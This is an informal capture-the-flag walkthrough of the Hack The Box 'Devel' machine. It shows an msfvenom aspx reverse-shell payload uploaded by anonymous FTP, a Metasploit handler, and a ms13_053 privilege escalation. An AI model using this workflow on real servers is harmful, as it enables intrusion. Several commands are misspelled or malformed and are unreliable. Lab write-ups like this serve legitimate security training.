Hack the box devel walkthtrou

 Let us first do an nmap scan

nmap -sS -A -p- 10.10.10.5 -oN nmap.txt

From the results we are can see that we have 2 ports/services running:

1. FTP running on port 21 – The ftp-anon script reveals that can authenticate to the FTP server anonymously and lists the contents of the default directory revealing various files that are synonymous with a Microsoft IIS web server. This means that we can use FTP to upload files that can then be accessed via the web server.
2. Microsoft IIS 7.5 web server running on port 80.

This preliminary scan reveals very important information about our target that we can use to stage and structure our attack.

We have anonymous FTP access and we can upload files directly to the web server. This gives us an idea of the type of attack we stage. We will generate an aspx reverse shell with Msfvenom and upload it to the web server via FTP, after which we can set up our reverse shell handler with Metasploit and execute the reverse shell via the web browser.

By default Microsoft IIS is configured to run either asp files or aspx files, the latter being the most widely supported. We can begin our exploitation by generating an aspx reverse meterpreter payload with Msfvenom.

Exploitation

Accessing the web server reveals a default installation of Microsoft IIS 7.5 that displays the IIS logo, this logo is also visible from the FTP server.

Ftp allows anonymous login

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR-IP LPORT=4444 -f aspx > shell.aspx

So we will login anonymously 

Ftp>ip addres

After generating the payload with Msfvenom we can upload it to the web server via FTP using the FTP put command. We can then list the contents of the directory to confirm that the aspx shell has been uploaded.

Because this is a meterpreter shell we need to set up a handler with Metasploit. We can fire up metasploit and use the exploit/multi/handler module.

We then need to set the payload we had used to generate the reverse shell payload with Msfvenom. In this case, the payload we will be using is windows/meterpreter/reverse_tcp

After setting up our module options we can then run the listener and execute the aspx meterpreter shell on the web server, after which, we should get a meterpreter session.

So we will just run the listener on web to execute

So just type this in your web browser real quick

10.10.10.5/shell.aspx

And it will execute imediately

Now that we have access to the box with a meterpreter session, we can start performing some local enumeration to understand what users and privileges we have and what environment we are working in. The sysinfo command reveals that box is running Windows 7 build 7600, we can then get a shell on the box and run system commands like whoami, this reveals that we are currently logged in as the iis apppool service user.

So let us know do some priv escalation

>get seystem

We can also utilize the windows exploit suggester module with Metasploit, this module scans a system for potential post/privesc exploits that can be used to elevate privileges.

The first step is to put our meterpreter session in the background, after which we can search and load the module.

You just type :>background

We can then set the SESSION ID to that of our meterpreter session and run the module. The results reveal various privesc modules that are suitable, after some research the best option is: exploit/windows/local/ms13_053_schlamperei.

:set session1

The module runs successfully and injects the exploit, we can now get back into our meterpreter session and migrate our session into the winlogon.exe process that now has elevated privileges.

Just type :migrate 452

Then>shell boom

Know we are in as admin